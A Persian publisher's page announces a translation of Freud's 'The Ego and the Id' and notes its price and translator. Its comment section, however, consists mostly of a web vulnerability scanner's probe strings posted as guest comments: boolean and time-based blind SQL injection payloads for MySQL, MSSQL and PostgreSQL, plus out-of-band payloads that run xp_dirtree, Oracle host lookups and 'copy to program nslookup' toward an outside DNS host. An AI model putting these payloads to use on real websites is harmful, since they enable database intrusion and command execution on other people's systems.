1394/11/11 16:51:56

«ايگو و ايد (من و نهاد)» منتشر شد

ايد، ايگو و سوپر‌‌ايگو سه اصل نظريه‌ي ساختاري ذهن فرويد است كه براي نخستين‌بار در كتاب «فراسوي اصل لذت» وي مطرح شده بود. كتاب «ايگو و ايد» در ادامه‌ي همان سير فكري تأليف شده و سه اصل مذكور را با جزئيات بيشتري شرح داده است. اين كتاب در درجه‌ي اول به ايگو (من) و تأثير و بررسي تنش‌هاي دروني متأثر بر آن مي‌پردازد؛ تنش‌هاي مابين ايگو و ايد (من و نهاد)، ايگو و سوپر‌ايگو (من و فرا‌من) و تنش‌هاي ميان دو غريزه‌ي عشق و مرگ. من، كه بين نهاد و فرا‌من به دام افتاده، خود را درگير افكاري از نهاد مي‌بيند كه سركوب شده و توسط فرا‌من تنزل يافته‌اند.

«ايگو و ايد» دومين كتاب از مجموعه‌اي است كه انتشارات پندار تابان از آثار فرويد منتشر مي‌كند. اولين كتاب اين مجموعه «مطالعاتي در باب هيستري» است كه توسط فرويد و يوزف بروئر نوشته شده است و عموماَ به عنوان نقطه‌ي آغاز روان‌كاوي شناخته مي‌شود.

«ايگو و ايد (من و نهاد)» با ترجمه‌ي امين‌پاشا صمديان و با قيمت 5500 تومان منتشر شده است.

لينك خريد اينترنتي كتاب

ديگر كتاب‌هاي اين نويسنده

ثبت نظر

نظرات (75)
sample@email.tst 1397/01/05 1:11:56
1
مهمان 1397/01/05 2:23:40
1
مهمان 1397/01/05 2:23:41
1
مهمان 1397/01/05 2:23:43
zyqMj0Cd
مهمان 1397/01/05 2:23:46
-1 OR 2+671-671-1=0+0+0+1 --
مهمان 1397/01/05 2:23:49
1'"
مهمان 1397/01/05 2:24:1
-1 OR 2+358-358-1=0+0+0+1
مهمان 1397/01/05 2:24:5
-1' OR 2+976-976-1=0+0+0+1 --
مهمان 1397/01/05 2:24:5
\
مهمان 1397/01/05 2:24:9
-1' OR 2+128-128-1=0+0+0+1 or 'MbEMbiQD'='
مهمان 1397/01/05 2:24:9
1����%2527%2522
مهمان 1397/01/05 2:24:10
-1" OR 2+67-67-1=0+0+0+1 --
مهمان 1397/01/05 2:24:14
@@poeG0
مهمان 1397/01/05 2:24:16
JyI=
مهمان 1397/01/05 2:24:17
�'�"
مهمان 1397/01/05 2:24:19
�''�""
مهمان 1397/01/05 2:24:21
1
مهمان 1397/01/05 2:24:23
1
مهمان 1397/01/05 2:24:29
1
مهمان 1397/01/05 2:24:32
if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/
مهمان 1397/01/05 2:24:33
(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/
مهمان 1397/01/05 2:24:43
if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/
مهمان 1397/01/05 2:24:44
1
مهمان 1397/01/05 2:24:46
1
مهمان 1397/01/05 2:24:50
-1; waitfor delay '0:0:6' --
مهمان 1397/01/05 2:25:6
-1; waitfor delay '0:0:0' --
مهمان 1397/01/05 2:25:7
-1); waitfor delay '0:0:6' --
مهمان 1397/01/05 2:25:8
1
مهمان 1397/01/05 2:25:10
1
مهمان 1397/01/05 2:25:14
-1)); waitfor delay '0:0:6' --
مهمان 1397/01/05 2:25:21
-1)); waitfor delay '0:0:9' --
مهمان 1397/01/05 2:25:25
1 waitfor delay '0:0:6' --
مهمان 1397/01/05 2:25:29
w3LXQDkP'; waitfor delay '0:0:6' --
مهمان 1397/01/05 2:25:39
ZXk79BED'); waitfor delay '0:0:6' --
مهمان 1397/01/05 2:25:42
L1YH6Jio'); waitfor delay '0:0:3' --
مهمان 1397/01/05 2:25:50
ilB1j4Qw')); waitfor delay '0:0:9' --
مهمان 1397/01/05 2:25:53
-1;select pg_sleep(9); --
مهمان 1397/01/05 2:26:7
-1);select pg_sleep(9); --
مهمان 1397/01/05 2:26:21
-1);select pg_sleep(6); --
مهمان 1397/01/05 2:26:32
-1);select pg_sleep(0); --
مهمان 1397/01/05 2:26:54
-1));select pg_sleep(9); --
مهمان 1397/01/05 2:27:20
-1));select pg_sleep(6); --
مهمان 1397/01/05 2:27:27
-1));select pg_sleep(3); --
مهمان 1397/01/05 2:27:28
-1));select pg_sleep(0); --
مهمان 1397/01/05 2:28:1
p5osWtJ9';select pg_sleep(6); --
مهمان 1397/01/05 2:28:19
vmxy3g8J';select pg_sleep(0); --
مهمان 1397/01/05 2:28:27
wLpyerZq';select pg_sleep(3); --
مهمان 1397/01/05 2:29:1
uyfxyt20');select pg_sleep(6); --
مهمان 1397/01/05 2:29:2
Ruc3LbQV'));select pg_sleep(9); --
مهمان 1397/01/05 2:29:3
1||UTL_INADDR.get_host_address('dns.'||'sqli.035887.75-136.75.9c588.1.bxss'||'.me')
مهمان 1397/01/05 2:29:9
DHXKqWns');select pg_sleep(9); --
مهمان 1397/01/05 2:29:13
'||UTL_INADDR.get_host_address('dns.'||'sqli.035887.75-138.75.9c588.1.bxss'||'.me')||'
مهمان 1397/01/05 2:29:16
dQg35odp');select pg_sleep(3); --
مهمان 1397/01/05 2:29:28
1;EXEC master..xp_dirtree '\\dns.sqli.035887.75-144.75.9c588.1.bxss.me\' --
مهمان 1397/01/05 2:29:36
1';EXEC master..xp_dirtree '\\dns.sqli.035887.75-148.75.9c588.1.bxss.me\' --
مهمان 1397/01/05 2:29:38
1');EXEC master..xp_dirtree '\\dns.sqli.035887.75-149.75.9c588.1.bxss.me\' --
مهمان 1397/01/05 2:29:58
1;copy (select '') to program 'nslookup dns.sqli.\035887.75-150.75.9c588.\1.bxss.me'
مهمان 1397/01/05 2:30:0
1';copy (select '') to program 'nslookup dns.sqli.\035887.75-157.75.9c588.\1.bxss.me
مهمان 1397/01/05 2:30:2
403'
مهمان 1397/01/05 2:30:3
1
مهمان 1397/01/05 2:30:15
1
مهمان 1397/01/05 2:30:19
1
مهمان 1397/01/05 2:30:21
1
مهمان 1397/01/05 2:30:25
1
مهمان 1397/01/05 2:30:27
1
مهمان 1397/01/05 2:30:31
1
مهمان 1397/01/05 2:30:44
1
مهمان 1397/01/05 2:30:53
1
مهمان 1397/01/05 2:30:58
1
مهمان 1397/01/05 2:31:0
1
مهمان 1397/01/05 2:31:6
1
مهمان 1397/01/05 2:31:7
1
مهمان 1397/01/06 23:29:30
1acuVr4aObmO7d
مهمان 1397/01/06 23:30:4
1
مهمان 1397/01/06 23:31:44
1